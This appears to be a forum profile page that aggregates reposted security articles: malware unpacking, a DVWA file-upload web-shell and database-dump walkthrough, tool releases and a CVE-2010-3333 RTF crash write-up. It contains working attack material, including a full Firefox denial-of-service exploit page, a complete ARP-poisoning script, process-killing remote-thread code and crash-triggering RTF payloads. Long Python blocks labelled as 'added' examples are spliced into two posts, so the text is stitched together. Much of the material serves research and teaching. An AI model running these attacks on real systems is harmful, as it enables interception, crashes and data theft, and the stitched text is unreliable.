
Nytro

Administrators
  • Posts

    18749
  • Joined

  • Last visited

  • Days Won

    721

Everything posted by Nytro

  1. [h=3]Using DLL Injection to Automatically Unpack Malware[/h]

     In this post, I will present DLL injection by means of automatically unpacking malware. But first, the most important question:

     [h=2]What is DLL Injection and Reasons for Injecting a DLL[/h]

     DLL injection is one way of executing code in the context of another process. There are other techniques to execute code in another process, but essentially this is the easiest way to do it. As a DLL brings nifty features like automatic relocation of code and good testability, you don't have to reinvent the wheel and do everything on your own. But why should you want to inject a DLL into a foreign process?

     There are lots of reasons to inject a DLL. As you are within the process address space, you have full control over the process. You can read and write arbitrary memory locations, set hooks etc. with unsurpassed performance. You could basically do the same with a debugger, but it is way more convenient to do it in an injected DLL. Some showcases are:

     - creation of cheats, trainers
     - extracting passwords and encryption keys
     - unpacking packed/encrypted executables

     To me, especially the opportunity of unpacking and decrypting malware is very interesting. Basically, most malware samples are packed by the same packer or family of packers. In the following, I will shortly summarize how it works.

     [h=2]The Malware Packer[/h]

     In order to evade anti-virus detection, the authors of the packer have devised an interesting unpacking procedure. Roughly, it can be summarized in the following stages: First, the unpacker stub does some inconspicuous-looking stuff in order to thwart AV detection. The code is slightly obfuscated, but not so strongly as to raise suspicion. Actually, the code that is being executed decrypts parts of the executable and jumps to it by self-modifying code. In the snippet below, you see how exactly the code is modified.
     The first instruction of the function that is supposedly called is changed to a jump to the newly decrypted code.

         mov [ebp+var_1], 0F6h
         mov al, [ebp+var_1]
         mov ecx, ptr_to_function
         xor al, 0A1h
         sub al, 6Eh
         mov [ecx], al            ; =0xE9
         mov ecx, ptr_to_function
         ...
         mov [ecx+1], eax         ; delta to decrypted code
         ...
         call eax

     As you can see (after doing some math), an unconditional near jmp is inserted right at the beginning of the function to be called. Hence, by calling a supposedly normal function, the decrypted code is executed. The decrypted stub allocates some memory and copies the whole executable to that memory. Then it does some relocation (as the base address has changed) and executes the entry point of the executable. In the following code excerpt, you can see the generic calculation of the entry point:

         mov edx, [ebp+newImageBase]
         mov ecx, [edx+3Ch]       ; e_lfanew
         add ecx, edx             ; get PE header
         ...
         mov ebx, [ecx+28h]       ; get AddressOfEntryPoint
         add ebx, edx             ; add imageBase
         ...
         mov [ebp+vaOfEntryPoint], ebx
         ...
         mov ebx, [ebp+vaOfEntryPoint]
         ...
         call ebx

     Here, the next stage begins. At first glance it seems the same code is executed twice, but naturally, there's a deviation in control flow. For example, the packer authors had to make sure that the encrypted code doesn't get decrypted twice. For that, they declared a global variable which in this sample initially holds the value 0x6E6C82B7. So upon first execution, the variable alreadyDecrypted is set to zero.

         mov eax, alreadyDecrypted
         cmp eax, 6E6C82B7h
         jnz dontInitialize
         ...
         mov alreadyDecrypted, 0
         dontInitialize:
         ...

     In the decryption function, that variable is checked for zero, as you can see/calculate in the following snippet:

         mov [ebp+const_0DF2EF03], 0DF2EF03h
         mov edi, 75683572h
         mov esi, 789ADA71h
         mov eax, [ebp+const_0DF2EF03]
         mov ecx, alreadyDecrypted
         xor eax, edi
         sub eax, esi
         cmp eax, ecx             ; eax = 0
         jnz dontDecrypt

     Once more, you see the obfuscation employed by the packer.
     Then, a lengthy function is executed that takes care of the actual unpacking process. It comprises the following steps:

     - gather chunks of the packed program from the executable memory space
     - BASE64-decode it
     - decompress it
     - write it section by section to the original executable's memory space, effectively overwriting all of the original code
     - fix imports etc.

     After that, the OEP (original entry point) is called. The image below depicts a typical OEP of an unspecified malware. Note that after a call to some initialization function, the first API function it calls is SetErrorMode.

     [Image: Code at the OEP]

     [h=3]Weaknesses[/h]

     What are possible points to attack the unpacking process? Basically, you can grab the unpacked binary at two points: first, when it is completely unpacked on the heap, but not yet written to the original executable's image space, and second, once the malware has reached its OEP. The second option is the most common and generic one when unpacking binaries, so I will explain that one. Naturally, you can write a static unpacker and perhaps one of my future posts will deal with that.

     One of the largest weaknesses is the memory allocations and setting the appropriate access rights. As a matter of fact, in order to write to the original executable's memory, the unpacker grants RWE access to the whole image space. Hence, it has no problems accessing and executing all data and code contained in it. If you set a breakpoint on VirtualProtect, you will see what I mean. There are very distinct calls to this function and the one setting the appropriate rights to the whole image space really sticks out.
     After a little research, I found two articles dealing with the unpacking process of the packer (here and here), but both seem not to be aware that the technique presented in the following is really easily implemented. Once you have reached the VirtualProtect call that changes the access rights to RWE, you can change the flags to RW-only, hence execution of the unpacked binary will not be possible. So, once the unpacker tries to jump to the OEP, an exception will be raised due to missing execution rights.

     So, now that we know the correct location where to break the packer, how to unpack malware automatically? Here DLL injection enters the scene. The basic idea is very simple:

     - start the binary in suspended state
     - inject a DLL
     - this DLL sets a hook on VirtualProtect, changing RWE to RW at the correct place
     - as backup, a hook on SetErrorMode is set. Hence, when encountering unknown packers, the binary won't be executed for too long.
     - resume the process

     Some other things have to be taken care of, like correctly dumping the process and rebuilding imports, but these are out of the scope of this article. If you encounter them yourself and don't know how to handle them, just ask me ;-)

     It seems not too easy to find a decent DLL injector. Especially one that injects a DLL before the program starts (if there is one around, please tell me). As I could not find an injector that is capable of injecting right at program start, I coded my own. You can find it at my GitHub page. It uses code from Jan Newger, so kudos to him. I'm particularly fond of using test-driven development employing the googletest framework ;-)

     [h=3]Conclusion[/h]

     The presented technique works very well against the unpacker. So far, I've encountered about 50 samples and almost all can be unpacked using this technique. Furthermore, all unpackers that overwrite the original executable's image space can be unpacked by this technique. In future posts, I will evaluate this technique against other packers.
     Posted by Sebastian Eschweiler at 03:20. Source: Malware Muncher: Using DLL Injection to Automatically Unpack Malware
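The entry-point calculation in the stub above (e_lfanew at 0x3C, AddressOfEntryPoint at PE header + 0x28, plus the new image base) and the xor/sub constant hiding are easy to reproduce on the analyst's side. The following is an added example, not code from the post or from the author's injector: it walks a minimal PE32 image that is constructed inline (not a real sample), computes the entry-point VA for a relocated copy exactly as the stub does, reports whether the entry point lands in a section that is both writable and executable (the RWE layout the post describes the unpacker granting), and decodes the two obfuscated constants shown in the snippets. All offsets follow the PE specification; the section flags and image contents are this example's own test data.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def build_test_image():
    """Minimal PE32 image CONSTRUCTED for this example (not a real binary)."""
    pe_off = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", pe_off)  # e_lfanew at 0x3C
    # COFF header: Machine=i386, 2 sections, SizeOfOptionalHeader=0xE0, EXECUTABLE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)      # Magic: PE32
    struct.pack_into("<I", opt, 0x10, 0x1000)     # AddressOfEntryPoint (RVA, inside .text)
    struct.pack_into("<I", opt, 0x1C, 0x400000)   # ImageBase

    def section(name, va, size, chars):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
        # NumberOfLinenumbers, Characteristics
        return struct.pack("<8sIIIIIIHHI", name, size, va, size, 0, 0, 0, 0, 0, chars)

    secs = section(b".text", 0x1000, 0x1000, 0x60000020)   # CODE | EXECUTE | READ
    secs += section(b".data", 0x2000, 0x1000, 0xC0000040)  # INITIALIZED_DATA | READ | WRITE
    return dos + b"PE\0\0" + coff + bytes(opt) + secs


def pe_header_offset(image):
    """e_lfanew, the DWORD at DOS header offset 0x3C (the stub's `mov ecx, [edx+3Ch]`)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    return pe


def entry_point_rva(image):
    """AddressOfEntryPoint sits at PE header + 0x28 (the stub's `mov ebx, [ecx+28h]`)."""
    return struct.unpack_from("<I", image, pe_header_offset(image) + 0x28)[0]


def entry_point_va(image, image_base=None):
    """VA = image base + AddressOfEntryPoint, as the stub computes it for its relocated
    copy. With no base given, the header's own ImageBase (PE + 0x34 for PE32) is used."""
    if image_base is None:
        image_base = struct.unpack_from("<I", image, pe_header_offset(image) + 0x34)[0]
    return image_base + entry_point_rva(image)


def sections(image):
    """Yield (name, VirtualAddress, VirtualSize, Characteristics) per section header."""
    pe = pe_header_offset(image)
    nsec = struct.unpack_from("<H", image, pe + 6)[0]
    opt_size = struct.unpack_from("<H", image, pe + 20)[0]
    first = pe + 24 + opt_size
    for i in range(nsec):
        name, vsize, va, *_rest, chars = struct.unpack_from("<8sIIIIIIHHI", image, first + 40 * i)
        yield name.rstrip(b"\0").decode(), va, vsize, chars


def entry_point_section(image):
    """(section name, executable?, writable?) for the section holding the entry point,
    or None if it lies outside every section. Writable+executable is the RWE layout
    the post describes; a normal linker output has an executable, read-only entry section."""
    rva = entry_point_rva(image)
    for name, va, vsize, chars in sections(image):
        if va <= rva < va + vsize:
            return name, bool(chars & IMAGE_SCN_MEM_EXECUTE), bool(chars & IMAGE_SCN_MEM_WRITE)
    return None


def deobfuscate(value, xor_key, sub_key, bits=8):
    """The packer's xor-then-sub constant hiding, truncated to the register width
    (al for the 0xE9 jmp opcode, eax for the alreadyDecrypted comparison)."""
    return ((value ^ xor_key) - sub_key) & ((1 << bits) - 1)


if __name__ == "__main__":
    img = build_test_image()
    print(hex(entry_point_va(img)), hex(entry_point_va(img, 0x10000000)))
    print(entry_point_section(img))
    print(hex(deobfuscate(0xF6, 0xA1, 0x6E)), hex(deobfuscate(0x0DF2EF03, 0x75683572, 0x789ADA71, 32)))
```

Run against a dumped process image instead of the constructed one, `entry_point_section` is a quick way to tell a clean dump from one whose headers still carry the packer's RWE section flags before you hand it to an import rebuilder.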
  2. Disabling Antivirus Program(S)

     Description: PDF: https://hacktivity.com/en/downloads/archives/185/

     Bachelor's Degree in Computer Science at the Faculty of Software Engineering at the College of Nyiregyhaza. He has more than 9 years of experience in the field of IT security, mostly in designing and creating security related products like DLP (data loss prevention) solutions and system log collectors. He was a developer of the widely known open source tool syslog-ng. Currently working as an IT security consultant and researcher at BDO MITM Kft.

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:

     Source: Disabling Antivirus Program(S)
  3. File Upload Exploitation

     File upload vulnerabilities constitute a major threat for web applications. A penetration tester can use a file upload form in order to upload different types of files that will allow him to obtain information about the web server or even a shell. Of course a shell is always a goal, but a good penetration tester must not stop there. Further activities can be performed after the shell. The focus of these activities must be on the database. In this article we will see how we can obtain a shell from the exploitation of a file upload on a Linux web server and how we can dump the database that is running on the system.

     Backtrack includes a variety of web shells for different technologies like PHP, ASP etc. In our example we will use the Damn Vulnerable Web Application, which is written in PHP, in order to attack the web server through the file upload. The web shell that we will use in our case will be the php-reverse-shell.

     [Image: Uploading the web shell]

     Now we have to set our machine to listen on the same port as our web shell. We can do this with netcat and the command nc -lvp 4444. The next step is to go back to the web application and try to access the URL where the PHP reverse shell exists. We will notice that it will return a shell to our console:

     [Image: Obtaining a shell]

     So we have compromised the remote web server and we can execute further commands from our shell, like a simple ls in order to discover directories.

     [Image: Listing directories]

     Now it is time to dump the database. We will have to go to the directory with the name uploads, because this directory has write permissions and it is visible to the outside world, which means that we can access it and we can create a file. Then we can use the following command in order to dump the database to a file.
         mysqldump -u root -p dvwa > hacked_db.sql

     We already know that the user root exists because it is already logged into the system. Also it is very common for the name of the application or of the company to be the database name, so we will use dvwa. The > sign will create a file inside the uploads directory with the name hacked_db.sql.

     [Image: Dumping the database to a file]

     As we can see from the image above we had to provide a password. In this scenario we just pressed enter without submitting anything. In a real world penetration test it would be much more difficult; however, it is always a good practice to try some of the common passwords. The next two images show the dump of the dvwa database.

     [Image: Dump of DVWA database]

     [Image: Dump of DVWA database 2]

     From the last image we can see that we even obtain the password hash of the admin, which can be cracked by using a tool like John the Ripper. This is also important as we may want to have the admin privileges inside the application.

     Conclusion

     In this article we saw how we can obtain a shell by exploiting a file upload form of an application and how we can dump the database. Of course in a real world scenario it is more likely that restrictions will be in place, but it is good to know the methodology and the technique that we must follow once we have managed to upload our web shell.

     Source: File Upload Exploitation
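The walkthrough above succeeds because the upload handler accepts any file and stores it under a web-reachable, executable path. The following is an added example, not DVWA's code or the article's: a server-side validation routine that closes each door the article walks through (script extension, double extension, path components, non-image content, polyglot image with an embedded script tag) and assigns a server-chosen storage name. The allow-list, magic bytes, size limit and marker list are this example's own assumptions; the sample inputs in the `__main__` block are constructed.

```python
import os
import re
import secrets

# Allowed extensions and the magic bytes each must start with (this example's allow-list).
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# One stem, one extension: "shell.php.png" style double extensions never match.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")
# Markers that turn an otherwise valid image into a polyglot script (assumed list).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def validate_upload(filename, data, max_bytes=2 * 1024 * 1024):
    """Return (accepted, detail). Every rejection maps to one trick in the article."""
    normalized = filename.replace("\\", "/")
    if os.path.basename(normalized) != filename:
        return False, "path components in filename"
    m = SAFE_NAME.match(filename)
    if not m:
        return False, "filename must be stem.ext with safe characters and a single extension"
    ext = m.group(1).lower()
    if ext not in ALLOWED:
        return False, f"extension .{ext} not on the allow-list"
    if len(data) > max_bytes:
        return False, f"file larger than {max_bytes} bytes"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match the magic bytes for the extension"
    lowered = data.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        return False, "script marker embedded in image data"
    return True, ext


def storage_name(ext):
    """Server-chosen random name: the uploader never controls where the file lands."""
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample uploads for this example.
    samples = [
        ("shell.php", b"<?php echo 1; ?>"),
        ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
        ("../photo.png", b"\x89PNG\r\n\x1a\n"),
        ("pic.gif", b"GIF89a" + b"<?php echo 1; ?>"),
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for name, content in samples:
        ok, detail = validate_upload(name, content)
        print(f"{name:16} {'ACCEPT' if ok else 'REJECT'}: {detail}" + (f" -> {storage_name(detail)}" if ok else ""))
```

Validation alone is not enough: the article's dump works because the `uploads` directory is both writable and served with script execution enabled. Store accepted files outside the document root (or in a location where the web server has no script handler and no execute permission) and serve them through a handler that sets the content type from the validated extension rather than from the stored path.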
  4. [h=2]Mozilla Firefox 14.0.1 Denial of Service Vulnerability[/h]

     Author: knowlegend

         <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
         <html xmlns="http://www.w3.org/1999/xhtml">
         <head>
         <title>FF-14.0.1 DoS-Exploit by Know v3.0</title>
         <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
         <meta name="Description" content="FF-14.0.1 DoS-Exploit by Know v3.0" />
         <script type="text/javascript" language="JavaScript">
         var CrashIt = false;
         if (typeof CrashIt != 'undefined') {
             CrashIt = new XMLHttpRequest();
         }
         if (!CrashIt) {
             try {
                 CrashIt = new ActiveXObject("Msxml2.XMLHTTP");
             } catch(e) {
                 try {
                     CrashIt = new ActiveXObject("Microsoft.XMLHTTP");
                 } catch(e) {
                     CrashIt = null;
                 }
             }
         }
         function load() {
             CrashIt.open('get','bla.php');
             CrashIt.onreadystatechange = handleContent;
             CrashIt.send(null);
             return false;
         }
         function handleContent() {
             // busy-waits on readyState inside the callback, which is what hangs the browser
             while(CrashIt.readyState != 4) {
                 document.getElementById('inhalt').innerHTML = "pwnd";
             }
             document.getElementById('inhalt').innerHTML = CrashIt.responseText;
         }
         </script>
         </head>
         <body onload="load();">
         <div id="inhalt"></div>
         </body>
         </html>

     # 1337day.com [2012-12-23]

     Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  5. [h=3]Fast Network cracker Hydra v 7.4[/h]

     One of the biggest security holes is passwords, as every password security study shows. A very fast network logon cracker which supports many different services, THC-Hydra is now updated to version 7.4.

     Hydra is available for Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX. It currently supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

     Change Log

     - New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!)
     - Added support for win8 and win2012 server to the RDP module
     - Better target distribution if -M is used
     - Added colored output (needs libcurses)
     - Better library detection for current Cygwin and OS X
     - Fixed the -W option
     - Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested
     - Fixed HTTP Form module false positive when no answer was received from the server
     - Fixed SMB module return code for invalid hours logon and LM auth disabled
     - Fixed http-{get|post-form} from xhydra
     - Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz)
     - Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-)
     - Added debug mode option to usage (thanks to Anold Black)

     Download THC-Hydra 7.4

     Source: Fast Network cracker Hydra v 7.4 updated version download - Hacker News, Security updates
  6. Arachni Web Application Security Scanner Framework

     Web application hacking is very common and there are so many tools that can exploit web application vulnerabilities like SQL injection, XSS, RFI, LFI and others. The very first step is to find the vulnerabilities in the web application. Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. So in this article I will show you how to get and install Arachni and how to launch your first attack against a web application.

     Download Arachni. I am on Linux BackTrack 5 R1, but you can use another Linux distribution like Ubuntu. Start the web mode of Arachni:

         root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_web

     Now the question is how to edit the Dispatchers of Arachni, because without dispatchers Arachni does not work.

         root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_rpcd

     Now click on the plugins to choose the best plugins, then click on the modules to select and unselect modules depending on your need. Now click on start scan to run your first scan, enter the URL of the target web application and then simply start the attack; after some time you need to evaluate the report to get the vulnerabilities.

     Source: Arachni Web Application Security Scanner Framework Tutorial | Ethical Hacking - Your Way To The World Of IT Security
  7. What is that "mc"?
  8. [h=2]ARP Poisoning Script[/h]

     The purpose of this script is to automate the process of ARP poison attacks. The attacker must only insert the IP address of the target and the IP of the gateway. This script was coded by Travis Phillips and you can find the source code below:

         #!/bin/bash
         niccard=eth1
         if [[ $EUID -ne 0 ]]; then
             echo -e "\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
             echo -e "\t\t\t Example: sudo $0 \n"
             exit 1
         else
             echo -e "\n\033[1;32m#######################################"
             echo -e "# ARP Poison Script #"
             echo -e "#######################################"
             echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
             echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
             echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
             echo -n "Please enter target's IP: "
             read victimIP
             echo -n "Please enter Gateway's IP: "
             read gatewayIP
             echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
             echo -e "\t\t--==[Targets]==--"
             echo -e "\t\tTarget: $victimIP"
             echo -e "\t\tGateway: $gatewayIP \n\n"
             echo -e " [*] Enabling IP Forwarding \n"
             echo "1" > /proc/sys/net/ipv4/ip_forward
             echo -e " [*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
             xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
         fi

     [Image: ARP poison script]

     Source: https://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/
  9. [h=1]Samhain 3.0.9![/h]

     by Mayuresh on December 22, 2012

     For open source HIDS lovers, we have an updated release of Samhain! It is the bugfixed Samhain version 3.0.9! Our original post about Samhain can be found here.

     Samhain 3.0.9

     "The Samhain open source host-based intrusion detection system (HIDS) provides file integrity checking and logfile monitoring/analysis, as well as rootkit detection, port monitoring, detection of rogue SUID executables, and hidden processes. It has been designed to monitor multiple hosts with potentially different operating systems, providing centralized logging and maintenance, although it can also be used as a standalone application on a single host. Samhain is an open-source multiplatform application for POSIX systems (Unix, Linux, Cygwin/Windows)."

     Official change log for Samhain 3.0.9:

     - Some build errors have been fixed.
     - The 'probe' command for the server has been fixed (clients could be erroneously omitted under certain conditions).
     - An option 'IgnoreTimestampsOnly' has been added to the Windows registry check (ignore changes if only the timestamp has changed).
     - Full scans requested by the inotify module will now only run at times configured for full scans anyway.

     [h=3]Download Samhain:[/h]

     Samhain 3.0.9 - samhain-current.tar.gz/samhain-3.0.9.tar.gz

     Source: Samhain version 3.0.9! — PenTestIT
  10. GNUnet P2P Framework 0.9.5

      Authored by Christian Grothoff | Site ovmj.org

      GNUnet is a peer-to-peer framework with a focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service built on top of the framework is anonymous file sharing.

      Changes: This release adds support for non-anonymous data transfers over multiple hops (if both publisher and replicator are using an anonymity level of zero). It fixes various bugs and includes cosmetic improvements in the gnunet-setup and gnunet-fs-gtk user interfaces.

      Download: http://packetstormsecurity.org/files/download/119046/gnunet-0.9.5.tar.gz

      Source: GNUnet P2P Framework 0.9.5 ≈ Packet Storm
  11. Entropy Broker RNG 2.1

      Authored by Folkert van Heusden | Site vanheusden.com

      Entropy Broker is an infrastructure for distributing cryptographically secure random numbers (entropy data) from one or more servers to one or more clients. Entropy Broker allows you to distribute entropy data (random values) to /dev/random devices from other systems (real servers or virtualised systems). It helps prevent the /dev/random device from getting depleted; an empty /dev/random device can cause programs to hang (waiting for entropy data to become available). This is useful for systems that need to generate encryption keys, run VPN software or run a casino website.

      Changes: This release adds a Web interface for viewing usage statistics, per-user bandwidth limits, and many small fixes.

      Download: http://packetstormsecurity.org/files/download/119047/eb-2.1.tgz

      Source: Entropy Broker RNG 2.1 ≈ Packet Storm
  12. Bluefog 0.0.2

      Authored by Tom Nardi | Site digifail.com

      Bluefog is a tool that can generate an essentially unlimited number of phantom Bluetooth devices. It can be used to test Bluetooth scanning and monitoring systems, make it more difficult for attackers to lock onto your devices, or otherwise complicate the normal operation of Bluetooth devices. Technically, Bluefog can work with just one Bluetooth adapter, but it works much better when you connect multiple adapters. Up to four radios are currently supported simultaneously.

      Changes: This release is in the very early stages of development and there are some areas of the software which need attention and improvement. There is currently very little in the way of error checking.

      Download: http://packetstormsecurity.org/files/download/119045/bluefog-0.0.2.tar.gz

      Source: Bluefog 0.0.2 ≈ Packet Storm
  13. There is secimg.php for images, both in posts and in the signature. And as for anonymizing links (referrer)... You did not specify WHY it would be necessary.
  14. The Diviner - Digital Clairvoyance Breakthrough - Gaining Access To The Source Code And Server Side Structure Of Any Application

      Description: PDF: https://hacktivity.com/en/downloads/archives/187/

      Shay Chen is the CTO of Hacktics, an advanced security center of Ernst & Young. He is also a prominent blogger and researcher, and is responsible for many security publications, including new application level attacks, various security tool comparison initiatives and two of the biggest research projects performed in the field of automated security scanners (including the latest comparison of 60 web application scanners). In his current position in Hacktics, Shay is in charge of research, training, optimization, quality assurance and the constant improvement of Hacktics security services. He has over ten years in information technology and security, including a strong background in software development. Shay is an experienced speaker, and regularly instructs a wide variety of security related courses. Before moving into the information security field, he was involved in various software development projects in ERP, mobile & enterprise environments.

      Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:

      Source: The Diviner - Digital Clairvoyance Breakthrough - Gaining Access To The Source Code And Server Side Structure Of Any Application
  15. [h=1]Using RtlCreateUserThread[/h]

      Author: zwclose7

      This is an example usage of RtlCreateUserThread. This program will create a remote thread that calls ExitProcess within the target process, causing the target process to exit.

      Source code:

          #include <iostream>
          #include <Windows.h>
          using namespace std;

          // CLIENT_ID is not declared in the public SDK headers, so it is defined here.
          typedef struct _CLIENT_ID {
              PVOID UniqueProcess;
              PVOID UniqueThread;
          } CLIENT_ID, *PCLIENT_ID;

          // Prototype of the undocumented ntdll export, resolved at run time.
          typedef long (*_RtlCreateUserThread)(HANDLE, PSECURITY_DESCRIPTOR, BOOLEAN, ULONG, PULONG, PULONG, PVOID, PVOID, PHANDLE, PCLIENT_ID);
          _RtlCreateUserThread RtlCreateUserThread;

          int main() {
              HANDLE hThd;
              CLIENT_ID cid;
              DWORD pid;
              HMODULE ntdll = LoadLibrary("ntdll.dll");
              HMODULE k32 = LoadLibrary("kernel32.dll");
              RtlCreateUserThread = (_RtlCreateUserThread)GetProcAddress(ntdll, "RtlCreateUserThread");
              cin >> pid;   // target process ID, read from stdin
              HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
              // Thread start address is kernel32!ExitProcess, so the target exits when the thread runs.
              RtlCreateUserThread(hProc, NULL, false, 0, 0, 0, (PVOID)GetProcAddress(k32, "ExitProcess"), 0, &hThd, &cid);
              WaitForSingleObject(hThd, INFINITE);
              CloseHandle(hThd);
              CloseHandle(hProc);
              FreeLibrary(k32);
              FreeLibrary(ntdll);
              return 0;
          }

      http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3746

      Source: Using RtlCreateUserThread - rohitab.com - Forums
  16. In-Memory Fuzzing in JAVA

      SWISS ETHICAL HACKING ©2012 High-Tech Bridge SA – www.htbridge.com
      In-Memory Fuzzing in JAVA, 2012.12.17, Xavier ROUSSEL

      I. What is Fuzzing?
      - Introduction
      - Fuzzing process
      - Targets
      - Inputs vectors
      - Data generation
      - Target monitoring
      - Advantages and drawbacks

      II. In Memory Fuzzing
      - Why use in-memory Fuzzing?
      - Principle
      - Data injection example
      - Building in-memory Fuzzer
      - Creating loop in memory
      - Advantages and drawbacks

      III. DbgHelp4J
      - Presentation
      - Key features
      - Example
      - Implementing in-memory Fuzzer

      IV. Real case study
      - EasyFTP 1.7.0.11

      I. What is fuzzing? Introduction

      - OWASP definition: "Fuzz testing or Fuzzing is a Black Box software testing technique, which basically consists in finding implementation bugs using malformed/semi-malformed data injection in an automated fashion."
      - Alternative to code review, mainly used in white box testing.
      - Due to automated tests, fuzzing allows us to assess a piece of software against a huge set of test cases in little time.
      - Especially useful to test common application implementations like FTP servers or HTTP servers.

      Download: www.exploit-db.com/download_pdf/23570
  17. [h=1]Exploiting CVE-2010-3333[/h]

      Arun, December 20, 2012

      CVE 2010-3333 tells us two important things: that this is a stack-based buffer overflow, and that it has something to do with the RTF parser. What it doesn't tell us is what on Earth we're looking for. After all, Microsoft's RTF spec is quite long, and there are too many things for us to fuss about to easily find out what the vulnerability is all about. Fortunately, by going over the relevant Metasploit module, or reading some analysis, we can conclude that the vulnerability lies in the parsing algorithm for the pFragments data array.

      You might ask yourself what this post will contribute, given that there's already a Metasploit module and an analysis out there. Well, the analysis deals with Word 2003, which is really not relevant nowadays (or at least I would hope so), and the Metasploit module uses SEH overwrite to run the payload, which naturally does not work on Word 2010. We aim to show you how to exploit this vulnerability on Word 2010 running on Windows 7, meaning we'll have to deal with DEP and ASLR at the very least.

      First things first: how do we even trigger the vulnerability? This is what the RTF spec has to say about the pFragments property:

      Property: pFragments
      Meaning: Fragments are optional, additional parts to the shape. They allow the shape to contain multiple paths and parts. This property lists the fragments of the shape.
      Type of value: Array
      Default: NULL

      What's an "array" you ask? Here's what the spec has to say about it: "Arrays are formatted as a sequence of numbers separated by semicolons. The first number tells the size of each element in the array in bytes. The number of bytes per element may be 2, 4, or 8. When the size of the element is 8, each element is represented as a group of two numbers.
      The second number tells the number of elements in the array."

      An RTF file is really a text file containing formatting instructions (alongside the actual text) that get interpreted by the RTF parser. Naturally, it is bloated. The RTF spec states that, in order to use the pFragments property, we should at least have the following text in our RTF file:

          {\rtf1{\shp{\sp{\snpFragments}{\sv<s>;;}}}}

      What comes after "\sv" is an array, comprising the data for the pFragments property. According to the spec, <S> represents the size of each array element, and should be 2, 4 or 8, but it appears that any number can be used. It's even better if the number is not 2, 4 or 8, as fewer checks are performed in the code. The <N> part tells us the number of elements in the array, but we'll soon see that other numbers are actually used to calculate the size of the array. <DATA> is the contents of the array, written as a string of hexadecimal digits, where each two characters (digits) represent one byte, and the format of multi-byte values is little-endian. Fun fact: only lowercase letters can be used to represent the hex digits; uppercase letters will be treated as zeros.

      Just so you'd be able to keep records, wwlib.dll is at 0x6F870000 and mso.dll is at 0x6D2F0000. The version of both DLLs is 14.0.4734.1000.

      Let's have a go at it. Load the following RTF file into an unpatched Word 2010:

          {\rtf1{\shp{\sp{\snpFragments}{\sv 2;4;41414141414141414141414141414141}}}}

      Here's the result: Run that through the debugger and see where we crashed: We see that the crash is in mso.dll, when trying to read a value in memory through a corrupted pointer.
      Say we don't follow the spec and use 1 instead of 2 as <S>:

          {\rtf1{\shp{\sp{\snpFragments}{\sv 1;4;41414141414141414141414141414141}}}}

